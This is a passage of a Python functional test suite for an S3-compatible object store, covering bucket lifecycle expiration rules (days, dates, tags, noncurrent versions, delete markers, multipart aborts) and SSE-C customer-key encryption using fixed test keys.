@attr(operation='test lifecycle expiration with versioning and 2 tags')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_versioned_tags2():
bucket_name = get_new_bucket()
client = get_client()
# mix in versioning
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
response = setup_lifecycle_tags2(client, bucket_name)
time.sleep(28)
response = client.list_objects(Bucket=bucket_name)
expire1_objects = response['Contents']
eq(len(expire1_objects), 1)
# setup for scenario based on vidushi mishra's in rhbz#1877737
def setup_lifecycle_noncur_tags(client, bucket_name, days):
# first create and tag the objects (10 versions of 1)
key = "myobject_"
tagset = {'TagSet':
[{'Key': 'vidushi', 'Value': 'mishra'}]}
for ix in range(10):
body = "%s v%d" % (key, ix)
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
response = client.put_object_tagging(Bucket=bucket_name, Key=key,
Tagging=tagset)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
lifecycle_config = {
'Rules': [
{
'NoncurrentVersionExpiration': {
'NoncurrentDays': days,
},
'ID': 'rule_tag1',
'Filter': {
'Prefix': '',
'Tag': {
'Key': 'vidushi',
'Value': 'mishra'
},
},
'Status': 'Enabled',
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle_config)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
return response
def verify_lifecycle_expiration_noncur_tags(client, bucket_name, secs):
time.sleep(secs)
try:
response = client.list_object_versions(Bucket=bucket_name)
objs_list = response['Versions']
except:
objs_list = []
return len(objs_list)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle noncurrent expiration with 1 tag filter')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_noncur_tags1():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
# create 10 object versions (9 noncurrent) and a tag-filter
# noncurrent version expiration at 4 "days"
response = setup_lifecycle_noncur_tags(client, bucket_name, 4)
num_objs = verify_lifecycle_expiration_noncur_tags(
client, bucket_name, 20)
# at T+20, 10 objects should exist
eq(num_objs, 10)
num_objs = verify_lifecycle_expiration_noncur_tags(
client, bucket_name, 40)
# at T+60, only the current object version should exist
eq(num_objs, 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='id too long in lifecycle rule')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_id_too_long():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 256*'a', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='same id')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_same_id():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 1}, 'Prefix': 'test1/', 'Status':'Enabled'},
{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test2/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='invalid status in lifecycle rule')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_invalid_status():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
rules=[{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'disabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
rules=[{'ID': 'rule1', 'Expiration': {'Days': 2}, 'Prefix': 'test1/', 'Status':'invalid'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'MalformedXML')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with expiration date')
@attr('lifecycle')
def test_lifecycle_set_date():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '2017-09-27'}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with not iso8601 date')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_set_invalid_date():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '20200101'}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration with date')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_expiration_date():
bucket_name = _create_objects(keys=['past/foo', 'future/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '2015-01-01'}, 'Prefix': 'past/', 'Status':'Enabled'},
{'ID': 'rule2', 'Expiration': {'Date': '2030-01-01'}, 'Prefix': 'future/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
response = client.list_objects(Bucket=bucket_name)
init_objects = response['Contents']
time.sleep(20)
response = client.list_objects(Bucket=bucket_name)
expire_objects = response['Contents']
eq(len(init_objects), 2)
eq(len(expire_objects), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration days 0')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_days0():
bucket_name = _create_objects(keys=['days0/foo', 'days0/bar'])
client = get_client()
rules=[{'Expiration': {'Days': 0}, 'ID': 'rule1', 'Prefix': 'days0/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
# days: 0 is legal in a transition rule, but not legal in an
# expiration rule
response_code = ""
try:
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
except botocore.exceptions.ClientError as e:
response_code = e.response['Error']['Code']
eq(response_code, 'InvalidArgument')
def setup_lifecycle_expiration(client, bucket_name, rule_id, delta_days,
rule_prefix):
rules=[{'ID': rule_id,
'Expiration': {'Days': delta_days}, 'Prefix': rule_prefix,
'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
key = rule_prefix + 'foo'
body = 'bar'
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
return response
def check_lifecycle_expiration_header(response, start_time, rule_id,
delta_days):
expr_exists = ('x-amz-expiration' in response['ResponseMetadata']['HTTPHeaders'])
if (not expr_exists):
return False
expr_hdr = response['ResponseMetadata']['HTTPHeaders']['x-amz-expiration']
m = re.search(r'expiry-date="(.+)", rule-id="(.+)"', expr_hdr)
expiration = dateutil.parser.parse(m.group(1))
days_to_expire = ((expiration.replace(tzinfo=None) - start_time).days == delta_days)
rule_eq_id = (m.group(2) == rule_id)
return days_to_expire and rule_eq_id
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle expiration header put')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_put():
bucket_name = get_new_bucket()
client = get_client()
now = datetime.datetime.now(None)
response = setup_lifecycle_expiration(
client, bucket_name, 'rule1', 1, 'days1/')
eq(check_lifecycle_expiration_header(response, now, 'rule1', 1), True)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='test lifecycle expiration header head')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_head():
bucket_name = get_new_bucket()
client = get_client()
now = datetime.datetime.now(None)
response = setup_lifecycle_expiration(
client, bucket_name, 'rule1', 1, 'days1/')
key = 'days1/' + 'foo'
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, now, 'rule1', 1), True)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='test lifecycle expiration header head with tags')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_tags_head():
bucket_name = get_new_bucket()
client = get_client()
lifecycle={
"Rules": [
{
"Filter": {
"Tag": {"Key": "key1", "Value": "tag1"}
},
"Status": "Enabled",
"Expiration": {
"Days": 1
},
"ID": "rule1"
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
key1 = "obj_key1"
body1 = "obj_key1_body"
tags1={'TagSet': [{'Key': 'key1', 'Value': 'tag1'},
{'Key': 'key5','Value': 'tag5'}]}
response = client.put_object(Bucket=bucket_name, Key=key1, Body=body1)
response = client.put_object_tagging(Bucket=bucket_name, Key=key1,Tagging=tags1)
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, datetime.datetime.now(None), 'rule1', 1), True)
# test that header is not returning when it should not
lifecycle={
"Rules": [
{
"Filter": {
"Tag": {"Key": "key2", "Value": "tag1"}
},
"Status": "Enabled",
"Expiration": {
"Days": 1
},
"ID": "rule1"
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, datetime.datetime.now(None), 'rule1', 1), False)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='test lifecycle expiration header head with tags and And')
@attr('lifecycle')
@attr('lifecycle_expiration')
def test_lifecycle_expiration_header_and_tags_head():
now = datetime.datetime.now(None)
bucket_name = get_new_bucket()
client = get_client()
lifecycle={
"Rules": [
{
"Filter": {
"And": {
"Tags": [
{
"Key": "key1",
"Value": "tag1"
},
{
"Key": "key5",
"Value": "tag6"
}
]
}
},
"Status": "Enabled",
"Expiration": {
"Days": 1
},
"ID": "rule1"
},
]
}
response = client.put_bucket_lifecycle_configuration(
Bucket=bucket_name, LifecycleConfiguration=lifecycle)
key1 = "obj_key1"
body1 = "obj_key1_body"
tags1={'TagSet': [{'Key': 'key1', 'Value': 'tag1'},
{'Key': 'key5','Value': 'tag5'}]}
response = client.put_object(Bucket=bucket_name, Key=key1, Body=body1)
response = client.put_object_tagging(Bucket=bucket_name, Key=key1,Tagging=tags1)
# stat the object, check header
response = client.head_object(Bucket=bucket_name, Key=key1)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(check_lifecycle_expiration_header(response, datetime.datetime.now(None), 'rule1', 1), False)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with noncurrent version expiration')
@attr('lifecycle')
def test_lifecycle_set_noncurrent():
bucket_name = _create_objects(keys=['past/foo', 'future/bar'])
client = get_client()
rules=[{'ID': 'rule1', 'NoncurrentVersionExpiration': {'NoncurrentDays': 2}, 'Prefix': 'past/', 'Status':'Enabled'},
{'ID': 'rule2', 'NoncurrentVersionExpiration': {'NoncurrentDays': 3}, 'Prefix': 'future/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle non-current version expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_noncur_expiration():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
create_multiple_versions(client, bucket_name, "test1/a", 3)
# not checking the object contents on the second run, because the function doesn't support multiple checks
create_multiple_versions(client, bucket_name, "test2/abc", 3, check_versions=False)
response = client.list_object_versions(Bucket=bucket_name)
init_versions = response['Versions']
rules=[{'ID': 'rule1', 'NoncurrentVersionExpiration': {'NoncurrentDays': 2}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(50)
response = client.list_object_versions(Bucket=bucket_name)
expire_versions = response['Versions']
eq(len(init_versions), 6)
eq(len(expire_versions), 4)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with delete marker expiration')
@attr('lifecycle')
def test_lifecycle_set_deletemarker():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with Filter')
@attr('lifecycle')
def test_lifecycle_set_filter():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Filter': {'Prefix': 'foo'}, 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with empty Filter')
@attr('lifecycle')
def test_lifecycle_set_empty_filter():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Filter': {}, 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle delete marker expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_deletemarker_expiration():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
create_multiple_versions(client, bucket_name, "test1/a", 1)
create_multiple_versions(client, bucket_name, "test2/abc", 1, check_versions=False)
client.delete_object(Bucket=bucket_name, Key="test1/a")
client.delete_object(Bucket=bucket_name, Key="test2/abc")
response = client.list_object_versions(Bucket=bucket_name)
init_versions = response['Versions']
deleted_versions = response['DeleteMarkers']
total_init_versions = init_versions + deleted_versions
rules=[{'ID': 'rule1', 'NoncurrentVersionExpiration': {'NoncurrentDays': 1}, 'Expiration': {'ExpiredObjectDeleteMarker': True}, 'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(50)
response = client.list_object_versions(Bucket=bucket_name)
init_versions = response['Versions']
deleted_versions = response['DeleteMarkers']
total_expire_versions = init_versions + deleted_versions
eq(len(total_init_versions), 4)
eq(len(total_expire_versions), 2)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config with multipart expiration')
@attr('lifecycle')
def test_lifecycle_set_multipart():
bucket_name = get_new_bucket()
client = get_client()
rules = [
{'ID': 'rule1', 'Prefix': 'test1/', 'Status': 'Enabled',
'AbortIncompleteMultipartUpload': {'DaysAfterInitiation': 2}},
{'ID': 'rule2', 'Prefix': 'test2/', 'Status': 'Disabled',
'AbortIncompleteMultipartUpload': {'DaysAfterInitiation': 3}}
]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='test lifecycle multipart expiration')
@attr('lifecycle')
@attr('lifecycle_expiration')
@attr('fails_on_aws')
def test_lifecycle_multipart_expiration():
bucket_name = get_new_bucket()
client = get_client()
key_names = ['test1/a', 'test2/']
upload_ids = []
for key in key_names:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
upload_ids.append(response['UploadId'])
response = client.list_multipart_uploads(Bucket=bucket_name)
init_uploads = response['Uploads']
rules = [
{'ID': 'rule1', 'Prefix': 'test1/', 'Status': 'Enabled',
'AbortIncompleteMultipartUpload': {'DaysAfterInitiation': 2}},
]
lifecycle = {'Rules': rules}
response = client.put_bucket_lifecycle_configuration(Bucket=bucket_name, LifecycleConfiguration=lifecycle)
time.sleep(50)
response = client.list_multipart_uploads(Bucket=bucket_name)
expired_uploads = response['Uploads']
eq(len(init_uploads), 2)
eq(len(expired_uploads), 1)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='set lifecycle config transition with not iso8601 date')
@attr('lifecycle')
@attr(assertion='fails 400')
def test_lifecycle_transition_set_invalid_date():
bucket_name = get_new_bucket()
client = get_client()
rules=[{'ID': 'rule1', 'Expiration': {'Date': '2023-09-27'},'Transitions': [{'Date': '20220927','StorageClass': 'GLACIER'}],'Prefix': 'test1/', 'Status':'Enabled'}]
lifecycle = {'Rules': rules}
e = assert_raises(ClientError, client.put_bucket_lifecycle_configuration, Bucket=bucket_name, LifecycleConfiguration=lifecycle)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
def _test_encryption_sse_customer_write(file_size):
"""
Tests Create a file of A's, use it to set_contents_from_file.
Create a file of B's, use it to re-set_contents_from_file.
Re-read the contents, and confirm we get B's
"""
bucket_name = get_new_bucket()
client = get_client()
key = 'testobj'
data = 'A'*file_size
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, data)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 1 byte')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_1b():
_test_encryption_sse_customer_write(1)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 1KB')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_1kb():
_test_encryption_sse_customer_write(1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 1MB')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_1MB():
_test_encryption_sse_customer_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='Test SSE-C encrypted transfer 13 bytes')
@attr(assertion='success')
@attr('encryption')
def test_encrypted_transfer_13b():
_test_encryption_sse_customer_write(13)
@attr(assertion='success')
@attr('encryption')
def test_encryption_sse_c_method_head():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*1000
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
e = assert_raises(ClientError, client.head_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.HeadObject', lf)
response = client.head_object(Bucket=bucket_name, Key=key)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-C and read without SSE-C')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_present():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*1000
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-C but read with other key')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_other_key():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers_A = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
sse_client_headers_B = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': '6b+WOZ1T3cqZMxgThRcXAQBrS5mXKdDUphvpxptl9/4=',
'x-amz-server-side-encryption-customer-key-md5': 'arxBvwY2V4SiOne6yppVPQ=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers_A))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=key, Body=data)
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers_B))
client.meta.events.register('before-call.s3.GetObject', lf)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-C, but md5 is bad')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_invalid_md5():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'AAAAAAAAAAAAAAAAAAAAAA=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
@attr(resource='object')
@attr(method='put')
@attr(operation='write encrypted with SSE-C, but dont provide MD5')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_no_md5():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
@attr(resource='object')
@attr(method='put')
@attr(operation='declare SSE-C but do not provide key')
@attr(assertion='operation fails')
@attr('encryption')
def test_encryption_sse_c_no_key():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
@attr(resource='object')
@attr(method='put')
@attr(operation='Do not declare SSE-C but provide key and MD5')
@attr(assertion='operation successfull, no encryption')
@attr('encryption')
def test_encryption_key_no_sse_c():
bucket_name = get_new_bucket()
client = get_client()
data = 'A'*100
key = 'testobj'
sse_client_headers = {
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw=='
}
lf = (lambda **kwargs: kwargs['params']['headers'].update(sse_client_headers))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=key, Body=data)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
def _multipart_upload_enc(client, bucket_name, key, size, part_size, init_headers, part_headers, metadata, resend_parts):
"""
generate a multi-part upload for a random file of specifed size,
if requested, generate a list of the parts
return the upload descriptor
"""
if client == None:
client = get_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update(init_headers))
client.meta.events.register('before-call.s3.CreateMultipartUpload', lf)
if metadata == None:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key)
else:
response = client.create_multipart_upload(Bucket=bucket_name, Key=key, Metadata=metadata)
upload_id = response['UploadId']
s = ''
parts = []
for i, part in enumerate(generate_random(size, part_size)):
# part_num is necessary because PartNumber for upload_part and in parts must start at 1 and i starts at 0
part_num = i+1
s += part
lf = (lambda **kwargs: kwargs['params']['headers'].update(part_headers))
client.meta.events.register('before-call.s3.UploadPart', lf)
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': part_num})
if i in resend_parts:
lf = (lambda **kwargs: kwargs['params']['headers'].update(part_headers))
client.meta.events.register('before-call.s3.UploadPart', lf)
client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key, PartNumber=part_num, Body=part)
return (upload_id, s, parts)
def _check_content_using_range_enc(client, bucket_name, key, data, step, enc_headers=None):
response = client.get_object(Bucket=bucket_name, Key=key)
size = response['ContentLength']
for ofs in range(0, size, step):
toread = size - ofs
if toread > step:
toread = step
end = ofs + toread - 1
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.GetObject', lf)
r = 'bytes={s}-{e}'.format(s=ofs, e=end)
response = client.get_object(Bucket=bucket_name, Key=key, Range=r)
read_range = response['ContentLength']
body = _get_body(response)
eq(read_range, toread)
eq(body, data[ofs:end+1])
@attr(resource='object')
@attr(method='put')
@attr(operation='complete multi-part upload')
@attr(assertion='successful')
@attr('encryption')
@attr('fails_on_aws') # allow-unordered is a non-standard extension
def test_encryption_sse_c_multipart_upload():
bucket_name = get_new_bucket()
client = get_client()
key = "multipart_enc"
content_type = 'text/plain'
objlen = 30 * 1024 * 1024
metadata = {'foo': 'bar'}
enc_headers = {
'x-amz-server-side-encryption-customer-algorithm': 'AES256',
'x-amz-server-side-encryption-customer-key': 'pO3upElrwuEXSoFwCfnZPdSsmt/xWeFa0N9KgDijwVs=',
'x-amz-server-side-encryption-customer-key-md5': 'DWygnHRtgiJ77HCm+1rvHw==',
'Content-Type': content_type
}
resend_parts = []
(upload_id, data, parts) = _multipart_upload_enc(client, bucket_name, key, objlen,
part_size=5*1024*1024, init_headers=enc_headers, part_headers=enc_headers, metadata=metadata, resend_parts=resend_parts)
lf = (lambda **kwargs: kwargs['params']['headers'].update(enc_headers))
client.meta.events.register('before-call.s3.CompleteMultipartUpload', lf)
client.complete_multipart_upload(Bucket=bucket_name, Key=key, UploadId=upload_id, MultipartUpload={'Parts': parts})
response = client.head_bucket(Bucket=bucket_name)
rgw_object_count = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-object-count', 1))
eq(rgw_object_count, 1)
rgw_bytes_used = int(response['ResponseMetadata']['HTTPHeaders'].get('x-rgw-bytes-used', objlen))
